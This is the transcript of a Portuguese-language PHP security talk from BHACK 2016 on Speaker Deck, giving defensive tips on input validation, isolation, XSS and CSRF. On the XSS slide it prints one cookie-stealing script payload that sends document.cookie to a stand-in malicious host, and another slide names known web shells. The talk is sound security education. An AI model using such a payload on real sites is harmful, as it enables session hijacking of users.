$30 off During Our Annual Pro Sale. View Details »
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Dicas de segurança para o PHP e seus amigos
Search
Joubert RedRat
November 18, 2016
Technology
0
29
Dicas de segurança para o PHP e seus amigos
Joubert RedRat
November 18, 2016
Tweet
Share
More Decks by Joubert RedRat
See All by Joubert RedRat
Programação defensiva com PHP
joubertredrat
0
25
Testes de integração com Testcontainers
joubertredrat
0
32
Retome o controle do seu analytics com Matomo
joubertredrat
0
34
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
37
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
36
O poder do Object Calisthenics no PHP
joubertredrat
0
140
Playing with Docker and Docker Compose
joubertredrat
0
140
Why migrate your application to microservices?
joubertredrat
0
30
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
28
Other Decks in Technology
See All in Technology
Uncertainty in the LLM era - Science, more than scale
gaelvaroquaux
0
790
21st ACRi Webinar - Univ of Tokyo Presentation Slide (Ayumi Ohno)
nao_sumikawa
0
120
Challenging Hardware Contests with Zephyr and Lessons Learned
iotengineer22
0
120
pmconf2025 - データを活用し「価値」へ繋げる
glorypulse
0
700
新 Security HubがついにGA!仕組みや料金を深堀り #AWSreInvent #regrowth / AWS Security Hub Advanced GA
masahirokawahara
1
1.3k
法人支出管理領域におけるソフトウェアアーキテクチャに基づいたテスト戦略の実践
ogugu9
1
210
今からでも間に合う!速習Devin入門とその活用方法
ismk
1
420
regrowth_tokyo_2025_securityagent
hiashisan
0
160
モダンデータスタック (MDS) の話とデータ分析が起こすビジネス変革
sutotakeshi
0
390
安いGPUレンタルサービスについて
aratako
2
2.6k
Gemini でコードレビュー知見を見える化
zozotech
PRO
1
180
Oracle Technology Night #95 GoldenGate 26ai の実装に迫る1
oracle4engineer
PRO
0
150
Featured
See All Featured
RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub
eileencodes
141
34k
Designing for humans not robots
tammielis
254
26k
KATA
mclloyd
PRO
32
15k
Context Engineering - Making Every Token Count
addyosmani
9
490
Agile that works and the tools we love
rasmusluckow
331
21k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
3.2k
Why Our Code Smells
bkeepers
PRO
340
57k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
196
69k
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
54k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
36
6.2k
A better future with KSS
kneath
240
18k
The World Runs on Bad Software
bkeepers
PRO
72
12k
Transcript
Dicas de segurança para o PHP e seus amigos BHACK
2016 – SEGURANÇA TI CONHECIMENTO
Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no
meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos
Dicas de segurança para o PHP e seus amigos INFORMAÇÃO
É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO
Dicas de segurança para o PHP e seus amigos 1ª
DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 1ª
DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 2ª
DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS
Dicas de segurança para o PHP e seus amigos 3ª
DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa
Dicas de segurança para o PHP e seus amigos 3ª
DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include
Dicas de segurança para o PHP e seus amigos 4ª
DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 4ª
DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist
Dicas de segurança para o PHP e seus amigos 5ª
DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja
Dicas de segurança para o PHP e seus amigos 6ª
DICA EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento
Dicas de segurança para o PHP e seus amigos 6ª
DICA - EVITAR O USO DA PRIMARY KEY OU ID
Dicas de segurança para o PHP e seus amigos 7ª
DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING
Dicas de segurança para o PHP e seus amigos 7ª
DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>
Dicas de segurança para o PHP e seus amigos 8ª
DICA CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 8ª
DICA - CROSS SITE REQUEST FORGERY
Dicas de segurança para o PHP e seus amigos 9ª
DICA USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos 9ª
DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR
Dicas de segurança para o PHP e seus amigos ACABOU
AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM
joubertredrat
gaelvaroquaux
nao_sumikawa
iotengineer22
glorypulse
masahirokawahara
ogugu9
ismk
hiashisan
sutotakeshi
.jpg){kind=avatar}
aratako
zozotech
oracle4engineer
eileencodes
tammielis
mclloyd
addyosmani
rasmusluckow
bkeepers
soudai
destraynor
kevinliebholz
kneath
